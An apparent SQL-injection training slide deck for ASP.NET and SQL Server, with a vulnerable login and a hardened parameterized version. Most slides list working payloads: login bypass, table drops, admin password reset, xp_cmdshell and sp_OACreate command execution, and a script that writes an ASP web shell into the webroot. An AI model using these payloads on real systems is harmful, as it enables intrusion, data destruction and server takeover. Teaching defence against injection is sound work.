Security.NET Chapter 2. SQL Injection A form of a script injection attack Malicious user input is...

Page 1: Security.NET, Chapter 2

Page 2: SQL Injection

• A form of a script injection attack

• Malicious user input is used to affect the SQL script that is executed

Page 3: Example Table

CREATE TABLE [dbo].[users] (
    [id] [int] NOT NULL ,
    [uname] [varchar] (255) COLLATE Hebrew_CI_AS NULL ,
    [pass] [varchar] (255) COLLATE Hebrew_CI_AS NULL ,
    [priv] [int] NULL
) ON [PRIMARY]

Page 4: Example code

The login handler, with the two text boxes concatenated straight into the query text:

sqlConnection1.Open();
sqlCommand1.CommandText = "select * from users where uname='" + TextBox1.Text
    + "' and pass='" + TextBox2.Text + "'";
SqlDataReader d = sqlCommand1.ExecuteReader();
if (d.HasRows == true)
    Response.Redirect("ok.aspx");
else
    Response.Redirect("error.aspx");
d.Close();
sqlConnection1.Close();
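A hardened version of that login, added here as an illustration and not part of the original slides: the text-box values travel as SqlParameter values, so they are compared as literal strings and can never change the query text, and database errors are logged server-side instead of being shown to the browser. The web.config connection-string name "users" and the Button1_Click handler are assumptions.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;

public partial class Login : Page
{
    // Same users table as the slides. @uname and @pass are parameters, so an
    // input such as  ' or 1=1 --  is looked up as a user name and matches nothing.
    private const string LoginQuery =
        "select count(*) from users where uname = @uname and pass = @pass";

    // Assumed click handler for the login button (not from the original code).
    protected void Button1_Click(object sender, EventArgs e)
    {
        bool ok;
        try
        {
            ok = CredentialsMatch(TextBox1.Text, TextBox2.Text);
        }
        catch (SqlException ex)
        {
            // Keep the SQL error text out of the response: the "having 1=1" and
            // "group by" probes on the later slides depend on seeing it.
            Trace.Warn("login", "database error", ex);
            Response.Redirect("error.aspx");
            return;
        }
        Response.Redirect(ok ? "ok.aspx" : "error.aspx");
    }

    private static bool CredentialsMatch(string uname, string pass)
    {
        // Connection string assumed to live in web.config under the name "users".
        string cs = ConfigurationManager.ConnectionStrings["users"].ConnectionString;
        using (var conn = new SqlConnection(cs))
        using (var cmd = new SqlCommand(LoginQuery, conn))
        {
            // Typed, length-bounded parameters matching the varchar(255) columns.
            cmd.Parameters.Add("@uname", SqlDbType.VarChar, 255).Value = uname;
            cmd.Parameters.Add("@pass", SqlDbType.VarChar, 255).Value = pass;
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

The slides' table stores passwords in clear text; the comparison above keeps that layout only to stay comparable with the vulnerable version, and the login used by the application should not be allowed to run xp_cmdshell, the xp_reg* procedures or sp_OACreate shown on the following pages.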

Page 5: Bypass the check

• In the user textbox type:

' or 1=1 --

• You can also drop a table by typing:

'; drop table t1; --

Page 6: Find the table structure

• ' having 1=1--

• You get the error:

Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause

• Table name: users

• Column: id

Page 7: Table structure

• ' group by users.id having 1=1--

• ' group by users.id, users.uname having 1=1--

• ' group by users.id, users.uname, users.pass having 1=1--

• ' group by users.id, users.uname, users.pass, users.priv having 1=1--

Page 8: Data types

• ' union select sum(id) from users--

• ' union select sum(uname) from users--

• ' union select sum(pass) from users--

• ' union select sum(priv) from users--

Page 9: Create a new user

• '; insert users values(5,'hacker','pass',1); --

• You can also update the administrator password, for example:

'; update users set pass='12345' where uname='admin'; --

Page 10: Error messages

• Too much information

• All system messages:

select * from master..sysmessages

Page 11: Extended S.P. (extended stored procedures)

• ' exec master..xp_cmdshell 'calc' --

• Use for a D.O.S. attack

• Find the Windows users:

' exec master..xp_cmdshell 'net1 user > C:\Inetpub\wwwroot\sqlinj\u.txt' --

Page 12: Registry XP

• xp_regaddmultistring

• xp_regdeletekey

• xp_regdeletevalue

• xp_regenumkeys

• xp_regenumvalues

• xp_regread

• xp_regremovemultistring

• xp_regwrite

• Example:

– exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'

Page 13: Other XP

• exec master..xp_servicecontrol 'start', 'schedule'

• xp_availablemedia - reveals the available drives on the machine.

• xp_dirtree - allows a directory tree to be obtained

• xp_enumdsn - enumerates ODBC data sources on the server

• xp_loginconfig - reveals information about the security mode of the server.

• xp_terminate_process - terminates a process, given its PID

Page 14: COM Components

• T-SQL script:

declare @o int
exec sp_OACreate 'wscript.shell', @o out
exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'

• Browser:

'; declare @o int exec sp_OACreate 'wscript.shell', @o out exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'--

Page 15: Dynamic ASP

declare @o int, @f int, @t int, @ret int
exec sp_OACreate 'scripting.filesystemobject', @o out
exec sp_OAMethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_OAMethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'